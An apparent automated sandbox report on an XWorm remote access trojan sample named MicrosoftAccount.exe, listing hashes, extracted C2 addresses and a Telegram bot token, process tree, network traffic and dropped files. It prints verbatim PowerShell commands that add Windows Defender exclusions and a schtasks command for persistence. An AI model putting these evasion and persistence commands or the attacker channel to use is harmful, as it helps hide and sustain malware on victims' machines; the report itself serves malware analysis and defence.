Analysis

  • max time kernel
    297s
  • max time network
    291s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20/01/2025, 06:46 UTC

General

  • Target

    MicrosoftAccount.exe

  • Size

    69KB

  • MD5

    60efdd9e1cf39dd0a3a7fbdeb6a2d391

  • SHA1

    29dbc62cedd344c115047fcec30f83e81c6d794c

  • SHA256

    5ad2e8363c51cc2392e5ea5c34fd426d585c118a1010cd034ccca53cb9aea8b0

  • SHA512

    c070114f7bbc384b5362111a70f1a910ecbf08b909d9e7b4222c904c221a107494e38840f5bc443faee8822281c5d46d65c7970003b7b625e7d1488ce6d58b84

  • SSDEEP

    1536:fl/VpCz5Iqc+28akCkj42kbOOhW8DS6qfRtFAO5ZPYC:fldN8ak9kbbI8ot2O5ZPx

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:7703

147.185.221.25:7703

regarding-states.gl.at.ply.gg:7703

Attributes
  • Install_directory

    %AppData%

  • install_file

    ApplicationFrameHost.exe

  • telegram

    https://api.telegram.org/bot6353034618:AAHzEkRGIc7NNoV5QuVXoAVVOMmU4ikzPYc/sendMessage?chat_id=1735841155

Signatures

  • Detect Xworm Payload 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\MicrosoftAccount.exe
    "C:\Users\Admin\AppData\Local\Temp\MicrosoftAccount.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MicrosoftAccount.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2656
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftAccount.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ApplicationFrameHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1136
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ApplicationFrameHost" /tr "C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1920
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {DB69A6EE-46A9-4E2F-96D1-69FCC20E178F} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1736
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:316
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2524

Network

  • DNS lookup by MicrosoftAccount.exe
    Remote address: 8.8.8.8:53
    Request: api.telegram.org IN A
    Response: api.telegram.org IN A 149.154.167.220
  • 149.154.167.220:443 (api.telegram.org, tls)
    Process: MicrosoftAccount.exe
    Traffic: 388 B / 219 B, 5 / 5 packets
  • 147.185.221.25:7703 (configured C2)
    Process: MicrosoftAccount.exe
    Traffic: 4.1kB / 2.8kB, 56 / 56 packets
  • 8.8.8.8:53 (api.telegram.org, dns)
    Process: MicrosoftAccount.exe
    Traffic: 62 B / 78 B, 1 / 1 packets
    DNS request: api.telegram.org
    DNS response: 149.154.167.220

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe

    Filesize

    69KB

    MD5

    60efdd9e1cf39dd0a3a7fbdeb6a2d391

    SHA1

    29dbc62cedd344c115047fcec30f83e81c6d794c

    SHA256

    5ad2e8363c51cc2392e5ea5c34fd426d585c118a1010cd034ccca53cb9aea8b0

    SHA512

    c070114f7bbc384b5362111a70f1a910ecbf08b909d9e7b4222c904c221a107494e38840f5bc443faee8822281c5d46d65c7970003b7b625e7d1488ce6d58b84

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    d0665370034095695fb7f3c6745fa4ec

    SHA1

    98fbd68a233a31620b9660f19b1358d2e3b1d9ad

    SHA256

    e62986ea8323bf705a2a62fdd8fc2d0ec7ddd9d4cc4311bbb4568c5f6a22a766

    SHA512

    daa01ee15907193bec071d435bcc2024dc8f22a08d2f3886f10f36c14bbd97dbb2a0054c737bcadf4999f6ce3acb140d5434b6e8d267e5934bee33b8ea8d2c19

  • memory/316-42-0x0000000001060000-0x0000000001078000-memory.dmp

    Filesize

    96KB

  • memory/1680-14-0x000000001B600000-0x000000001B8E2000-memory.dmp

    Filesize

    2.9MB

  • memory/1680-15-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/1736-37-0x0000000000150000-0x0000000000168000-memory.dmp

    Filesize

    96KB

  • memory/2200-40-0x00000000008D0000-0x00000000008E8000-memory.dmp

    Filesize

    96KB

  • memory/2656-8-0x0000000001CE0000-0x0000000001CE8000-memory.dmp

    Filesize

    32KB

  • memory/2656-6-0x0000000002C80000-0x0000000002D00000-memory.dmp

    Filesize

    512KB

  • memory/2656-7-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

  • memory/2764-31-0x000000001B0D0000-0x000000001B150000-memory.dmp

    Filesize

    512KB

  • memory/2764-1-0x0000000000990000-0x00000000009A8000-memory.dmp

    Filesize

    96KB

  • memory/2764-33-0x000000001B0D0000-0x000000001B150000-memory.dmp

    Filesize

    512KB

  • memory/2764-32-0x000007FEF5FF3000-0x000007FEF5FF4000-memory.dmp

    Filesize

    4KB

  • memory/2764-0-0x000007FEF5FF3000-0x000007FEF5FF4000-memory.dmp

    Filesize

    4KB

  • memory/2840-44-0x0000000001390000-0x00000000013A8000-memory.dmp

    Filesize

    96KB
